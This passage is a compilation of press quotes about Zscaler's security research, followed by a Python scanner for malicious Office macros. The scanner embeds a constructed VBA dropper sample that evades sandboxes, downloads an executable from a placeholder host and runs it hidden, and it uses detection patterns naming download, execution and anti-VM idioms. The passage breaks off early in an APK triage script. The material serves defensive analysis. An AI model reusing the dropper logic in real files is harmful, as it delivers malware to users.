While conventional wisdom says that Android has laxer security than iOS, research suggests differently: Zscaler found that more Apple iOS mobile devices are leaking information like the exact location of devices and their owners than Android. Over the past three months, millions of both device types were found to be leaking enterprise data, privacy information and unique mobile device identifications.
IT administrators, Zscaler said, “should be applying strict MDM policies and educating employees about app security in an effort to stave off any kind of data loss or security breach.” Deepen Desai, director of security research at Zscaler, said administrators need to take control of the type of apps that are allowed to be installed on devices and they need to monitor app traffic over the corporate network and enforce policies.
"Apparently, the authors are taking advantage of the popularity of both the elections, to lure the victims, and the Cryptowall ransomware strain to scare the victims into paying," said Deepen Desai, Zscaler's director of security research.
“In recent cases, remote execution vulnerabilities in the Magento ecommerce Platform were exploited, which ultimately resulted in admin access to servers, and the opportunity for code manipulation and the installation of malware,” said Chris Hodson, CISO EMEA at Zscaler.
That is why it is necessary to create an effective perimeter around the Internet to protect employees, wherever they are and whatever device they use. The security rules an organisation puts in place inside its fortress must be as mobile as its users.
In an alert this week, security vendor Zscaler urged Internet users to be extra cautious about the sites they visit and the actions they take online to mitigate the threat from heightened election-related criminal campaigns. ‘They’re using this drama-filled election season as a backdrop for campaigns of their own,’ Zscaler security researcher Sameer Patil warned in the blog.
Hackers are using the hyper-partisan 2016 presidential election to launch new cyberattacks, according to new research from digital security firm Zscaler. The firm uncovered numerous adware campaigns where web ads promising bombshell news about the candidates trick users into clicking malware-laden links. One jaw-dropping example shows Donald Trump lying dead from a heart attack. Another infects the tricked user’s computer with a ransomware program that encrypts the victim’s files until a ransom payment is made.
“The record breaking fine imposed on TalkTalk is merely a drop in the ocean. If the breach was to take place after GDPR had been enforced, the severity of the penalty would have been significantly more damaging. With the risk of personal information reaching the public domain, organisations need to step up and ensure that they are accountable for personal data,” said Chris Hodson, CISO for EMEA at Zscaler.
Citrix announced a partnership with cloud-based security vendor Zscaler Inc. Citrix provides integration with the Zscaler gateway that provides URL filtering, firewall protection and other security features for all branch-office traffic between NetScaler SD-WAN and the public internet.
So individual "best-of-breed" components do not necessarily add up to an outstanding security infrastructure. The resulting recommendation is that companies should start their selection process for a solution as a top-down assessment based on strategic goals, and that decisions should no longer be made at the level of individual components.
To prepare for a smooth move to the cloud and to guarantee the necessary user experience in the cloud, companies often first have to rethink their IT network architecture and Internet security. With conventional hub-and-spoke models for data traffic, the new data volumes generated by the cloud can quickly lead to congested lines.
“Such a broad directive suggests that the intelligence community needed to cast a wide net, which likely included other providers," Michael Sutton chief information security officer at cybersecurity firm Zscaler said. Unfortunately, the very process of such directives precludes transparency and prohibits others from even revealing the existence of such a request.
“Businesses are looking to adopt cloud and mobile-first strategies to improve the agility and productivity of their workforce,” Andy Kennedy, Sales Engineering Manager, UK & Ireland at Zscaler said. “Backhauling traffic to the datacentre to carry out security checks flies in the face of that strategy, slowing down network performance and ramping up bandwidth costs.”
Michael Sutton, head of security at Zscaler (a company specialising in cybersecurity), draws the same conclusion: in his view, since the intelligence agencies are unable to break encryption, “they have no choice but to form partnerships with service providers. I think we will see other programmes like Yahoo’s, because the intelligence community can no longer work alone.”
While the Reuters story, if it is accurate, "may at first blush seem to be another black eye for Yahoo on the privacy front," Michael Sutton, CISO at Zscaler, in a statement emailed to SCMagazine.com, urged that "we shouldn't be quick to rush to judgement or single out Yahoo. It's unlikely that Yahoo alone received the classified U.S. government directive to search all incoming email messages."
“Commercial keyloggers are versatile tools for data theft, with which criminals steal as much data as possible from their victims.” Deepen Desai, Zscaler
“They can't defeat the encryption, so they really have no choice but to make the service provider their partner in this,” said Michael Sutton, CISO at security firm Zscaler. “I think you are going see more programs like this because the intelligence community can't do this on its own."
“With no technical details included in Yahoo’s report about how the data was exfiltrated, just that it was, it’s impossible to assess credibility of the ‘state sponsored’ claim. It might well be that Yahoo has had support from government departments and that attribution has been possible but equally, ‘state-sponsored’ is often prefixed to ‘actor’ in an effort to suggest sophisticated and surreptitious means of data exfiltration. We simply do not know,” Chris Hodson, CISO for EMEA at Zscaler said.
"[Yahoo] CEO Marissa Mayer may have had knowledge of a breach as early as July, yet did not disclose details to regulators and investors until last week. If true, Yahoo-acquirer Verizon is no doubt asking a lot of questions right now," Michael Sutton, CISO of Zscaler Inc., based in San Jose, Calif., wrote in a blog post. Such information is clearly of great importance during a due-diligence process, and yet as recently as September 9 in a regulatory filing with the [Securities and Exchange Commission], Yahoo claimed no knowledge of any data breaches.
"With no technical details included in Yahoo's report about how the data was exfiltrated, just that it was, it's impossible to assess credibility of the 'state sponsored' claim," Chris Hodson of enterprise security firm Zscaler said.
“There are the countries who actively fund organised groups. But there is also state-aware hacking where governments know it's going on but, potentially for their own benefit, there is a plausible deniability. However the targets of some of these cases are key. If you look at motive, there was a lot of scandal around Russian doping before the Olympics and then around a month or two later there was a large data breach of the doping association,” says Chris Hodson, from cyber security company Zscaler.
With no technical details included in Yahoo’s report about how the data was exfiltrated, just that it was, it’s impossible to assess credibility of the ‘state sponsored’ claim. “It might well be that Yahoo has had support from government departments and that attribution has been possible but equally, ‘state-sponsored’ is often prefixed to ‘actor’ in an effort to suggest sophisticated and surreptitious means of data exfiltration. We simply do not know,” Chris Hodson, EMEA chief information security officer at enterprise security firm Zscaler said.
"Burning questions still need answers," said Chris Hodson, an expert at cybersecurity firm Zscaler, which has worked with everyone from the UK's National Health Service (NHS) to the United States Marines. "With no technical details included in Yahoo's report about how the data was exfiltrated, just that it was, it's impossible to assess credibility of the 'state sponsored' claim without this," he said. In this instance, we can only speculate that the 'state sponsored actor' claim was made with a view to placating the general public.
Internet security platforms like Zscaler offer IoT devices protection against security breaches with a cloud-based solution. You can route the traffic through the platform and set policies for the devices so they won’t communicate with unnecessary servers.
“If you look back five years to get into the cybercrime market you had to have a level of technical skill, you had to have the funding for infrastructure components for the likes of ransomware or APT [Advanced Persistent Threats]. Now there are these affiliate schemes – or what I am calling ‘cybercrime as a service’ – where we are seeing that the barrier for entry is no longer what it was way back when. That is causing this proliferation of criminals who are coming to the market,” Chris Hodson, CISO for EMEA at Zscaler said.
“Overall, we are seeing a rise in malicious activity involving commercial keyloggers, which makes it very easy for a naive user with malicious intent to conduct successful attacks,” said Deepen Desai, director of security research at Zscaler.
“iSpy keylogger contains advanced keylogger functionality to steal information, monitor the target user's system activity via screenshots, and act as a surveillance system for criminals by capturing video through an infected system's webcam,” says Deepen Desai, director of security research at Zscaler.
“This extradition ruling could well be setting a new precedent for cyber-crime convictions. The penalties for cyber-crime have historically been disproportionate to in-person crime. However, this verdict could see that change, as cyber-crime is now more frequent and more damaging to nation states and businesses than ever before,” Chris Hodson, CISO EMEA at Zscaler said.
“By its very nature, hacking and online crime is complex and difficult to track, making attribution a tricky area for authorities. Even more so, when it comes to organized, financially-motivated criminal syndicates. The real challenge for courts and nation states is how they catch and prosecute the organized criminal syndicates that consistently cause economic loss and political havoc.”
“Boards are holding CISOs accountable,” Michael Sutton, CISO with cloud-security vendor Zscaler, recently told CSO Australia. “That's a positive thing because the role of the CISO is getting elevated — but not every CISO will survive that transition. The back-office technologist who doesn't know how to deal with the business side, is never going to survive.”
“Zscaler is growing, and so is its team, with the announcement that Chris Stephens will now become the company's senior marketing manager for the Asia Pacific region.”
“Often the demographics of an individual like [Guccifer] are male, young, highly intelligent. And the fact that they are getting recognition for their success continues to fuel them,” Sutton said.
Faced with this skills shortage, CIOs and business leaders must outsource protection and security mechanisms. As applications leave the data centre for the cloud, the best approach is to deploy security measures that also operate in the cloud.
Chris Hodson, EMEA CISO at Zscaler, told SCMagazineUK.com that in the case of Gugi, social engineering is coming via a spam SMS message. "Security professionals have a duty of care to educate users. SMS messages from an unknown number should always be treated with caution," he said.
Researchers at Zscaler recently discovered a new spyware campaign that used cybersquatting techniques to host, distribute and command-and-control the AgentTesla keylogger via a domain whose name was strikingly similar to Chesapeake, Virginia-based consulting and services firm Diode Technologies.
We therefore recommend a holistic approach whose security modules interact intelligently. It is important that all data is correlated in real time and automatically analysed for malware patterns. This includes not only the data generated within the corporate network, but also that of mobile users, IoT devices and all branch offices.
Zscaler said that it first learned about the keylogger when it landed in a customer’s cloud sandbox and was flagged for review. Upon further analysis, the company learned about the attackers’ cybersquatting tactics that were used to deliver the malware.
Since the beginning of August, analysts on Zscaler's Threatlabz team have been observing a new wave of activity from the Android Marcher Trojan - an old acquaintance since 2013 - which is now targeting the banking information of unsuspecting users with a new scheme. Earlier Marcher variants were distributed as fake apps via the Amazon or Google Play store.
We are seeing many infection attempts from this malware family in our cloud. These frequent changes point to active, constantly evolving malware development – which makes it the most prevalent threat to Android devices.
We have observed this more often recently with malicious Android application packages: they use scareware tactics, and the user receives a pop-up notice that their device is infected. The supposed update then promises to clean the device.
A site page serving the malware attempts to scare potential marks by showing that the device is vulnerable to viruses, inviting them to install a "fake" update to prevent future data theft. The tactic represents a change of tack by cybercrooks behind the scam, who previously spread the nasty through Amazon and Google Play store apps, cloud security firm Zscaler reports.
With the growing security concerns around mobile malware, this distribution is an attempt to lure users into downloading fake mobile firmware updates to infect their device. There's a bit of irony here too – users think they are downloading an update to protect their device, when in fact it's actually a malicious application designed to cause harm.
Manufacturers are looking for hardware components which are affordable and increase profit margins. Cheap, lightweight components in IoT devices often lack the capability to provide fundamental security services, such as encryption, as their hardware simply cannot support it.
Zscaler has labelled Marcher "the most prevalent threat to the Android devices" due to the constantly evolving nature of the malware. The best way for Android users to avoid falling victim to Marcher is to only download applications from trusted application stores such as Google Play, and not downloading anything from unknown sources.
While it may seem easier to simply blanket ban any live coverage during working hours, this will only leave employees feeling demotivated and encourage them to look for other means of viewing events. In turn, this could result in an increase in absence from the office and leave employees open to social engineering attacks, as their vigilance is lowered as they look for alternative means to stream events.
Zscaler was bashing the competition – literally – at Black Hat 2016. The cloud security company had set up a booth where attendees could suit up and take a hammer to security appliances, highlighting its own 100 percent cloud-based internet security solutions.
“At previous Games, Zscaler found that 80 percent of Olympic web domains were found to be scams and spams. This is an easy win for cyber-criminals, so I expect Phishing to be ripe again in 2016,” says Chris Hodson, CISO EMEA at Zscaler.
[Companies] are getting that advice from law enforcement. They have gone on record saying you are better off paying. The thing is if we did the basics, we wouldn’t be in that situation in the first place.
When you look at the way that stuff has been done in the past, companies have always used a VPN and the problem with a VPN is that it includes the letter ‘N’ which is ‘Network’ — it is a Virtual Private Network. Basically I have a client which runs on my machine and that creates a network tunnel and places me as a roaming user on that network. So I might only need to access one application but I have access to the entire network.
“At events of this kind, it is also common to visit sites selling fake tickets or offering free tickets. And this kind of activity can be carried out from the company's computers or from a personal device that uses the corporate network. For this reason, Zscaler advises organisations to make sure they identify phishing sites and detect scripts on web pages that could be malicious.”
“In recent years, Zscaler's Threatlabz team has found that 80 percent of all ‘Olympic’ websites were fraudulent or contained spam, as ap-verlag.de reported. Reason enough for companies to be especially alert. The risks lie in phishing and malware attacks as well as in mobile applications.”
While the business and security implications around the Games should not be taken lightly, many of the tactics cybercriminals will be using to target unsuspecting users are unlikely to be anything new. Defence in depth is of the utmost importance and businesses need to be extra vigilant when it comes to advanced security threats this August.
Businesses need to ensure that they are able to identify phishing sites and detect scripts which are running in webpages which could be malicious. Relying on URL filtering and reputation off-site is no longer an appropriate cybersecurity defense framework. Streaming sites should be enabled on a whitelist-only approach.
Protection and productivity should be at the forefront for business leaders across the world in the run up to the Games. In the last few years we’ve seen cybercriminals using spam emails and scam websites mirroring legitimate sites to entice users to click on, and download malicious files. This year’s events host similar risks and we should expect similar techniques from those trying to exploit users.
“Although this threat is targeted toward end users rather than organizations, if it is a corporate issued mobile device then it may cause financial loss to the organization as well,” said Deepen Desai, director of security research at Zscaler.
The truth is that although security measures may work, industry professionals can’t set them and forget them — or operate under false assumptions. Only when security professionals become aware of what they don’t know, can they start asking the right questions and implementing the right security controls.
CISOs are increasingly worried that cloud computing and data loss go hand-in-hand. This does not have to be the case, but it is all too common. Business stakeholders are demanding the cost and elasticity benefits of cloud, and we need to make sure that a core set of security capabilities exist to support cloud adoption.
“Cloud is not a trend. That’s for sure. It’s here to stay. Companies want to have control over their security but they don’t want to be in the business of managing, owning, maintaining boxes,” Sutton said.
More warnings about Pokemon Go, this time via Zscaler ThreatlabZ. In a blog post out today, researchers found an Android SMS Trojan disguised as the Pokemon Go app, which once downloaded secretly sends SMS to premium numbers costing the victim money, as well as malware that downloaded an autoclicker onto the phone that opens several pages and clicks on advertisements.
In speaking with SCMagazine.com, Amit Sinha, CTO and EVP of engineering and cloud operations at Zscaler, said the flaw is a ‘major vulnerability’ affecting all Mac users. ‘Any application that is installed on the Mac App Store has full access’ to the persistent cookies stored unencrypted in Safari's cookie store.
Zscaler discovered a vulnerability in Apple's recent OS X version (El Capitan), which enabled applications that did not have the appropriate privileges to access cookies stored in the Safari browser.
“As with most attacks, user awareness plays a huge part. The malware in question was not digitally signed. A vigilant user could have picked this up although it is more realistic to expect the organization to block the running of unsigned executables,” Zscaler EMEA CISO, Chris Hodson said.
“This access could result in a malicious application lifting all the persistent cookies for a given user and accessing sites posing as that user,” Zscaler said. In the case of email, it could result in a malicious application getting access to all your email. Worse, it could gain access to a site that stores more personal and confidential information about you.
Zscaler has found ransomware on the South African Gymnastics Federation and suggests it is a sign of things to come as interest in the Olympics heats up and sports fans search for live streams, tickets and other information. "As we get closer to the event, we expect to see a rise in threats and scams leveraging Olympics topics to target a large number of victims," it said.
The biggest problem with a typical VPN deployment is that it opens the entire network to the user - not just the few applications they require. The more of the network that is exposed through a VPN tunnel, the more potential security holes there are.
Security researchers at Zscaler ThreatLabZ reckon the miscreants behind Sundown have accelerated the evolution of what started out as a fairly rudimentary exploit kit since the beginning of 2016. The crooks behind Sundown used stolen code from the rival RIG exploit kit for a short time before subsequently knitting together their own code, security researchers at cloud security firm Zscaler ThreatLabZ report.
Michael Sutton opens the feature with an overview of the culture change and the threat landscape’s impact on roles (this follows an interview between Michael and Tony Morbin last month).
For me curiosity is one of the more important characteristics to nurture for innovation. In my experience it’s important to encourage that sense of curiosity in each and every team member through the open sharing of new ideas. Nothing is ever a bad idea, it might get shot down quickly if it doesn’t meet the requirements but you can’t encourage innovation without an open flow of ideas.
The world of IT security has undergone tremendous transformation, sparked by the consumerisation of the enterprise, the adoption of cloud computing, the ubiquity of mobile and BYOD devices and the evolution of threats, which are more serious today than they have ever been before.
Ransomware authors are changing their methods according to their target. It’s no longer the stray individual that is under attack, but corporate PCs, mobile devices and even servers. Why lock and/or pilfer a person’s files worth hundreds when corporate data is infinitely more valuable?
Last September Zscaler discovered a nasty piece of Android ransomware in the form of the Adult Player app. That app had to be accessed from non Google sites, and offered pornographic videos. But in reality, when it was opened, it secretly took pictures of the user with the phone’s front-facing camera, before the device was locked and displayed a demand for $500 (£330).
In the case of CCTV, price-point is also imperative. Manufacturers are looking for hardware components which are affordable and increase profit margins. Cheap, lightweight components in IoT devices often lack the capability to provide fundamental security services, such as encryption, as their hardware simply cannot support it. How many anti-malware products have been released for our IoT devices? Very few, if any.
Making a decision between one [managed security service] provider or another is not something that should be left to mainstream IT today. A dedicated security professional is needed to understand, interact, manage and monitor service providers.
A comment by Zscaler on shadow IT: why simply blocking applications is not a solution, and what approaches work instead.
Chris Hodson comments on the discovery of a new CCTV botnet. He asserts that IoT botnets are increasing because IoT-enabled devices are everywhere and the security development lifecycle for IoT devices is often expedited or bypassed due to strict deadlines around time to market or the cost of the hardware.
The lack of technical skills in-house restricts the freedom in which organizations can customize and manage their own security infrastructures. Instead, they have no choice but to look externally for assistance from consultants and managed service providers.
Those responsible in companies therefore have the new task of securing branch offices and mobile employees as well as possible. However, setting up hardware-based firewalls in every branch office is expensive, increases complexity and usually comes with an unsustainable administrative burden for the necessary upgrades.
Recently the attack vector is focusing more on the user side. Now the attackers are leveraging Office Documents with social engineering tactics. What will happen is if you open a malicious document that contains an embedded macro, you will see a security warning from Microsoft Office that says this document contains a macro. Basically it’s preventing you from getting infected. What hackers are now doing is they are saying that this content is protected and if you want to view this content you will have to enable the macros.
Ransomware is a threat that spreads very quickly across networks, and its distinguishing feature is encryption. That is why the analysis and control of SSL certificates must be part of a company's security strategy. Today, 25% of Internet traffic uses the SSL protocol, and most companies trust this security protocol and prefer to allocate their resources to analysing unencrypted traffic. That is the equivalent of locking your house with an armoured door but leaving the living-room window open.
The app appears to be that of the bank Sberbank and requests administrator privileges once installed, as shown below: the Zscaler team tried installing the original Sberbank application from the Google Play Store, and it is hard to tell the malicious app from the original.
But CIOs and CISOs should not therefore ban cloud applications wholesale: they can find ways to prevent these gaps from being created. To keep up, IT departments must move from the “block or allow” dilemma to a “manage and monitor” approach.
Based in San Jose, Calif., Zscaler offers a cloud security solution that preserves the user experience, while boosting web and application security with a cloud-based firewall proxy architecture that acts as a single virtual proxy to the web. This security-as-a-service approach helps drive better web, application, cloud and mobile security for customers. The solution can act as a CASB between users and cloud applications, inspecting traffic for malware and threats, as well as providing secure access capabilities.
Zscaler's integrated security platform delivers holistic protection and top performance thanks to Advanced Threat Protection, bandwidth management, remote access, next-generation firewall and web security. This approach goes much further and thus protects all users, branch offices and corporate headquarters entirely without deploying hardware at the perimeter.
Symantec may have not made the best call in terms of its choice in Blue Coat. Blue Coat lies in the web gateway security space with several faster-growing, smaller competitors like Zscaler, CipherCloud, Skyhigh and Cloudlock.
Scott Robertson, vice-president, Asia Pacific and Japan, Zscaler, has a different view. "While Symantec’s intent to buy Blue Coat validates the need for secure web gateway solutions, it does not align with where the market is going because it is essentially just a consolidation of the old paradigm – legacy appliances and on-premise software. With a distributed mobile workforce moving data and applications to the cloud, neither endpoints nor appliances are enough to keep enterprises secure today. The only viable way forward is a purpose-built cloud security platform to eliminate the need to buy, deploy and manage security appliances."
This article describes the increased use of malicious executables, a trend identified by Zscaler’s research team, ThreatLabZ. In addition to the rise in delivering executable payloads, cyber criminals are adding newer anti-VM and anti-analysis techniques to the malicious documents themselves, thereby protecting the end executable payloads from being downloaded and detected by automated analysis systems.
For the sixth consecutive year, Zscaler, an Internet security specialist, is the leader of Gartner's Magic Quadrant in the Secure Web Gateways category.
Zscaler, the leading cloud security provider, announced it has been named Leader by Gartner, Inc. in the 2016 Magic Quadrant for Secure Web Gateways. The report evaluates vendors on their “ability to execute” and “completeness of vision.” This is the sixth consecutive year that Zscaler has been recognised as a Leader amongst security providers.
For the latter, Blue Coat acquired the specialist vendor Elastica in November 2015 for 280 million dollars. By integrating its Cloud Application Security Broker (CASB), the enterprise security specialist wanted to expand its portfolio, above all for cloud scenarios. It was evidently reacting to pressure from companies such as Zscaler, which are better at securing diverse and complex cloud usage scenarios and put that capability front and centre.
The researchers noticed that a recent wave of malicious Microsoft Word documents were evading automatic analysis by using anti-virtual machine and anti-sandboxing techniques. Security researchers tend to use VMs or other types of sandboxes to protect their systems when analyzing files or malware code.
Zscaler said that attackers are now making use of macros, which of course are pieces of code embedded inside Microsoft Office documents (usually written in Visual Basic). Microsoft Office disables macros by default, but attackers are now apparently ‘using clever social engineering tactics to lure the user into enabling the macros.’
Macro malware became almost extinct after Microsoft disabled VBA macros by default in Office applications,’ several years ago, says Deepen Desai, director of research at security vendor Zscaler. However, with modern attacks increasingly targeting end users and endpoint systems, there has been a steady resurgence in the use of macro malware, Desai told Dark Reading.
The malware author makes an assumption here that most clean virtual environment snapshots will be taken after a fresh Microsoft Office install with probably one or two document files opened for testing the installation,’” Desai said. “’Alternately, a standard user system with Office applications should have at least 3 or more recently accessed document files
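The "recent documents" check Desai describes is easy to spot once the VBA source has been extracted from the document. The following script is an added example, not code from Zscaler or from the analysed campaign: it scans extracted macro text for that check and for the other idioms such a dropper needs (an auto-execute entry point, a download primitive, an execution primitive), reports the threshold the macro demands, and combines the findings into a verdict. The embedded macro is constructed for the example; the VM process names in the anti-VM pattern are ones commonly probed by macro malware and are an assumption of this example, not something the article lists.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a macro that implements the "recent documents" sandbox
# check described above. It is not the macro ThreatLabZ analysed; the URL and
# file names are placeholders.
SAMPLE_VBA = r"""
Sub AutoOpen()
    ' A freshly installed analysis VM rarely has a document history.
    If Application.RecentFiles.Count < 3 Then
        Exit Sub
    End If
    Dim target As String
    target = Environ("TEMP") & "\update.exe"
    URLDownloadToFile 0, "http://example.invalid/update.exe", target, 0, 0
    Shell target, vbHide
End Sub
"""


@dataclass(frozen=True)
class Finding:
    category: str
    line_no: int
    text: str


# Idioms worth flagging in extracted VBA. The RecentFiles pattern is the check
# Desai describes; the VM process names are ones commonly probed by macro
# malware (an assumption of this example, not something the article lists).
PATTERNS = [
    ("auto_exec", re.compile(r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I)),
    ("anti_sandbox_recent_files", re.compile(r"RecentFiles\s*\.\s*Count", re.I)),
    ("anti_vm_process_check", re.compile(r"\b(vmtoolsd|vboxservice|vmwaretray|vboxtray)\b", re.I)),
    ("payload_download", re.compile(r"URLDownloadToFile|XMLHTTP|WinHttpRequest", re.I)),
    ("execution", re.compile(r"\bShell\b|WScript\.Shell|CreateObject", re.I)),
]

RECENT_FILES_RE = re.compile(r"RecentFiles\s*\.\s*Count\s*(<=|<)\s*(\d+)", re.I)


def scan_vba(source: str) -> List[Finding]:
    """Return every executable line of the macro that matches one of the idioms above."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("'"):  # VBA comment, never executed
            continue
        for category, pattern in PATTERNS:
            if pattern.search(stripped):
                findings.append(Finding(category, line_no, stripped))
    return findings


def min_recent_files_required(source: str) -> Optional[int]:
    """Smallest RecentFiles.Count at which the macro continues past its
    sandbox check, or None if it performs no such check."""
    match = RECENT_FILES_RE.search(source)
    if match is None:
        return None
    op, n = match.group(1), int(match.group(2))
    return n if op == "<" else n + 1


def verdict(findings: List[Finding]) -> str:
    """An auto-executing macro that fetches or runs something AND tries to
    evade analysis is the pattern described in the article."""
    cats = {f.category for f in findings}
    auto = "auto_exec" in cats
    acts = bool(cats & {"payload_download", "execution"})
    evades = bool(cats & {"anti_sandbox_recent_files", "anti_vm_process_check"})
    if auto and acts and evades:
        return "high"
    if auto and acts:
        return "medium"
    return "low"


if __name__ == "__main__":
    for f in scan_vba(SAMPLE_VBA):
        print(f"line {f.line_no:2d} {f.category:26s} {f.text}")
    print("minimum recent files to detonate:", min_recent_files_required(SAMPLE_VBA))
    print("verdict:", verdict(scan_vba(SAMPLE_VBA)))
```

The threshold is the actionable part: a sandbox whose golden image opens a handful of harmless documents before the snapshot is taken will pass a check like this one, which is the cheap fix Desai's observation points to.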
This week, security firm Zscaler published a report on Android malware that's disguised as the official Sberbank mobile banking app. […] The app demonstrates one way that hackers have been tricking banking customers into revealing their access credentials, thus allowing attackers to drain their accounts.
The arrests were announced the same day researchers at security company Zscaler disclosed their analysis of a malicious Android application posing as the Sberbank mobile app. The malicious app steals credentials and requests extensive privileges on compromised devices. The app is worrisome because it can steal SMS messages and monitor incoming calls, two avenues by which banks send one-time passwords and PINs used as a second authentication factor.
Zscaler is a high-growth technology company which is focused on bringing cloud computing to internet security. It protects more than 15 million users at more than 5,000 of the world’s leading enterprises and government organizations worldwide against cyber-attacks and data breaches, while staying fully compliant with corporate and regulatory policies.
“What advice would you give to a new CISO standing in front of the board for the first time?”
“You have to be able to translate your world into theirs. You’re in a world with technical risk – we had this many incidents and this many computers were infected. You need to translate that into language the board can understand. For example – you had 20 infections on computers. What does that mean to them? But it’s straightforward to translate that. We had this many breaches that caused this much downtime and resulted in this much productivity loss. That’s something the board can understand.”
"In order to offer security as a service Zscaler has built its own cloud hosted in data centres around the world; two are in Australia. As Sutton explains: 'You always access everything through the internet... now you go through us to get there. The security challenge is that the security model of old is broken; it looked for bad things.' But, he said, there were gaps in visibility of bad things because of the uptake of public cloud, BYOD and mobile devices."
“Rather than prohibiting applications, CIOs and CISOs must find alternative ways to close the gaps. To keep pace, IT must go from ‘block or allow’ to ‘manage and monitor.’ It’s all too easy for businesses to feel overwhelmed at the new technology coming to the market, or new consumer apps penetrating the workplace.”
Charles Milton, Director of EMEA channels at Zscaler, flags up a couple of trends that are impacting on the footprint of the company’s cloud security application: “There is obviously increased mobility and cloud apps. From our point-of-view a lot of projects are driven by the adoption of major corporate cloud apps, leading to people transforming networking and the way they do business, and therefore their perception of security – things like Office 365, salesforce.com.
Internet security specialist Zscaler is countering the traditional VPN concept with a new cloud-based approach: Zscaler Private Access (ZPA). Built on its global cloud security infrastructure, it makes a remote connection possible from a specific user to a specific application without opening up access to the entire network.
This does carry risks, however. As evidence, Zscaler, a company specialising in IT security, reports that new spyware is spreading through Android app updates from these stores, posing as a new version of Chrome for mobile.
In April, security researchers at Zscaler came across malware that targets a specific bank and steals user credentials. This infostealer Trojan seems to be Spanish in origin, and so far has targeted users in the U.S. and Mexico.
Zscaler offers several different products on its platform that are all focused on cloud security. The Cloud Firewall product handles aggregate traffic at over 100 million sessions per second and provides native SSL inspection. One of the strengths of Zscaler's offerings is that it inspects every byte of traffic, so it should be easier to see and control the applications that are in use in the organization.
A new malware strain has been uncovered that steals information through phishing and by imitating bank webpages. According to Zscaler researchers, it watches for certain URLs, including those of Mexico's second largest bank, Banamex, in order to intercept the websites and replace them with proxies.
Zscaler's security research team has detected significant activity in the cloud related to an information-stealing malware, an "infostealer", disguised as a Google Chrome update. The malware is able to harvest call history, SMS data, browsing history and banking information and send them to a C&C server. It is also able to detect installed antivirus products and neutralise them to avoid being spotted.
Thanks to the underlying Zscaler cloud infrastructure, Zscaler Private Access is said to allow simultaneous access to internal applications on the network and to apps in the company's cloud data centre. With classic VPNs, such a flexible access option is only possible by routing traffic through the company's own data centre, which drives up costs. By contrast, Zscaler Private Access is said to give the user fast, automated access to internally or externally hosted applications, with the traffic secured by the Zscaler Security Cloud.
Once this malware is installed, the data it steals is transferred to a remote C2 (command and control) server. According to Zscaler's analysis, the malware can also detect and terminate any antivirus app installed on the target device. It is persistent enough that the victim cannot remove it permanently unless a factory reset is performed.
London-based communication service provider BT is plugging access points from security vendor Zscaler into its global network for better application performance over secure Internet connections. Zscaler's access points will act as a series of traffic checkpoints between businesses and the public Internet to identify and block potential threats, according to BT. The new service, Assure Managed Cloud with Zscaler, will provide real-time protection by scanning and filtering all network traffic, including SSL-encrypted sessions, the provider said.
A fake malicious Chrome update is being actively pushed onto Android users, saddling them with information-stealing malware that can be uninstalled only by restoring the device to factory settings, and losing data in the process. "Once installed, this infostealer cannot be removed from the phone as the malware does not allow the user to deactivate its administrative access. The only option to remove this malware is a factory reset which leads to further data loss," Zscaler researchers have discovered.
Cloud security vendor Zscaler Inc. is hoping to unseat the Virtual Private Network (VPN) in the enterprise world. Traditionally, organizations provide remote access to corporate apps via a VPN in order to protect their networks from remote attacks, but VPNs can be a tricky beast to use. Zscaler’s alternative is something called Zscaler Private Access, a new service that allows organizations to provide access to internal apps and services while ensuring they are secure, without any sign of a VPN.
There's a new piece of nasty Android malware floating around that Android users should be on the lookout for. Masquerading as an update for Google's mobile Chrome browser, the malware is hosted on webpages designed to look like official Google or Android landing pages. Originally spotted by the security firm Zscaler, the malware is designed to monitor call logs, browser history, text messages and banking information. Once installed, the malware logs the aforementioned data and sends it all back to a remote command and control server. What's more, Zscaler notes that the malware is capable of checking if a user has any antivirus apps installed, and if so, "terminating them to evade detection."
Zscaler therefore proposes to "decouple applications from the physical network to provide granular, per-user access to applications and services on the internal network, in the data centre, or in a public cloud". In practice this means setting up a tunnel, via the service provider's cloud infrastructure, between the client machine and the information-system asset it is trying to reach, with no direct connection. This tunnel is encrypted and, as a side benefit, avoids openly exposing an IP address or a dedicated server on the Internet.
Zscaler Private Access
ZPA, built on Zscaler’s cloud, delivers per-user application access, for apps in the datacenter, public cloud or both. Unlike VPNs, users are never “on-net,” and can only see authorized apps.
Zscaler has now drawn attention to new Android malware that steals banking data and other private data. The malware disguises itself as an update for the Chrome browser and is hosted not on a single URL but on a whole series of different URLs which, with name components such as "android-update" or at least "goog", are meant to give an official impression. Each is only active for a short time and is then rotated to defeat URL-based detection.
Director of Security Research at Zscaler, Deepen Desai, was interviewed by ZDNet and he said that "The malware may arrive from compromised or malicious websites using scareware tactics or social engineering." Users are advised to stay away from dubious websites and not to click OK no matter how tempting it is. Desai added that "One common theme we have seen in recent malicious android application packages involves scareware tactics where the user will see a popup indicating that their device is infected with a virus and asks them to update to clean up infection."
Zscaler points out that established antivirus products, such as ESET, Kaspersky and Avast, are vulnerable to the attack and stop working as soon as admin rights are granted to the malicious software. After the malware takes out the antivirus program, the info-thief starts its work. The fake Chrome will track the full list of calls and texts and forward the list to a command-and-control server.
“We are seeing many new URLs dropping this malware actively in the wild. Such infection of the victim’s device leads to critical information leakage like credit card details, SMS and call logs – which can further lead to financial banking fraud,” Zscaler said. “Once installed, this Infostealer cannot be removed from the phone as the malware does not allow the user to deactivate its administrative access. The only option to remove this malware is a factory reset, which leads to further data loss.”
Android Infostealer was first found by Zscaler inside third-party Android app stores in China, which are notorious for serving up malware disguised as legitimate apps. However, Zscaler found new instances of it in April, disguised as an update to the browser Google Chrome. Several rogue URLs were offering a download file titled Update_chrome.apk. When the user installs the APK, it prompts for administrative access. Worryingly, the malware payload is capable of checking for installed security applications and terminating them. Zscaler saw hard coded checks for antivirus applications like Kaspersky, ESET, Avast and Dr. Web.
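The three traits above (a device-admin receiver that blocks uninstallation, permissions over SMS and call logs, and hard-coded checks for AV packages) are all visible in a decoded APK before anything is run. The following triage script is an added example, not code from Zscaler: it parses a manifest as produced by a decoder such as apktool, checks the app's label against its package name, and looks for the AV package identifiers in the strings pulled from the app's code. The manifest and string list are constructed for the example, the package and class names are made up, and the antivirus package identifiers are this example's assumption for the vendors the article names (the article names vendors, not package names).

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"
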